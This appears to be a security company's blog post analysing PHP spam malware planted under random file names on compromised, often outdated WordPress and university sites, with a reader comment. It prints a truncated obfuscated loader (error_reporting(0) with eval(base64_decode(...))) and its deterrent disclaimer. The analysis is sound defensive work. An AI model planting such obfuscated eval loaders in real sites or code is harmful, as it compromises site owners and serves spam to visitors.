Funny Spammers: Any Reproduction of This Document in Part or in Whole is Strictly Prohibited

Spam is nothing new, but a recent site we were reviewing was a bit different. After a bit of analysis, we found a file called tracks.php that was generating spam with the following code on it:

<?php // Any reproduction of this document in part or in whole is strictly prohibited. For educational purposes only. 1993-2011 (c)
error_reporting(0) ;eval ( base64_decode("JGxMOXdGMWFZNHpYNmpUMWdUNmdRN2xPMG..

See the nice eval line? This eval line hides multiple calls to generate spammy content. The spammers even added a nice disclaimer to help discourage the site owner from analyzing the malware, very nice of them we thought.

Technical analysis

We did a bit more research on this type of spam and we found a bunch of other sites with the same content. However, the use of tracks.php was not consistant. The attackers were using random names across sites (paypal.php, content.php, possible.php, original.php, counter.php, packs.php, etc). They all perform very similar actions, they just use different names.

It seems that quite a few university sites are infected with this malware:

If you click on any of those links you would get a Viagra ad(or pharmacy shop), or other pharmaceutical related spam:

Viagra spam

Most of those seem to be caused by outdated installs of WordPress. As we always recommend, update your site if you don’t want to end up in a compromised list like this one.

If you need assistance, or a site cleaned, check out the Sucuri service plans.

About David Dede

David Dede is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

  • Pankajchandna

    but what is the solution .    i changed the server,    found the code hidden in one of the post and deleted it manually also

Share This